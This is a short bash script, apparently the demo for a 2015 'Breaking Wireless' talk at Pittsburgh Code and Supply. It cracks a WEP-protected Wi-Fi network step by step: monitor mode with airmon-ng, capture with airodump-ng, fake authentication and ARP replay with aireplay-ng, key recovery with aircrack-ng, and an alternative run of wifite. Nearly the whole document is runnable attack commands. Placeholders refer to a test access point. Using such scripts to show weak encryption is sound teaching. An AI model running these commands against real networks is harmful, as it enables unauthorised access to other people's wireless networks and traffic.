#!/bin/bash
# Tested on Kali GNU/Linux 1.1.0 as of 2015-07-06

## Configure the router to use WEP

## Scan the airwaves
service network-manager stop
airmon-ng start wlan0 6
airodump-ng mon0 -c 6

## Start Recording
airodump-ng -c 6 --bssid <Test AP> -w /root/Desktop/2015-07-07\ -\ Pittsburgh\ Code\ and\ Supply\ -\ Breaking\ Wireless\:\ \ The\ Dos\ and\ Don\'ts\ of\ Wi-Fi/WEP_Demo mon0

## Associate with the AP via Fake Authentication
aireplay-ng -1 30 -o 1 -q 10 -e <ESSID> -a <Test AP> -h <Test Client> mon0

## Replay ARP
aireplay-ng -3 -b <Test AP> -h <Test Client> mon0

## Crack the WEP
aircrack-ng -b <Test AP> /root/Desktop/2015-07-07\ -\ Pittsburgh\ Code\ and\ Supply\ -\ Breaking\ Wireless\:\ \ The\ Dos\ and\ Don\'ts\ of\ Wi-Fi/WEP_Demo-01.cap

## Point and shoot WEP cracking tool to simplify the process (Just a second way to break WEP easily)
/usr/bin/wifite

## Cleanup
airmon-ng stop mon0
service network-manager start
rm /root/Desktop/2015-07-07\ -\ Pittsburgh\ Code\ and\ Supply\ -\ Breaking\ Wireless\:\ \ The\ Dos\ and\ Don\'ts\ of\ Wi-Fi/WEP_Demo-01.{csv,kismet,cap}*
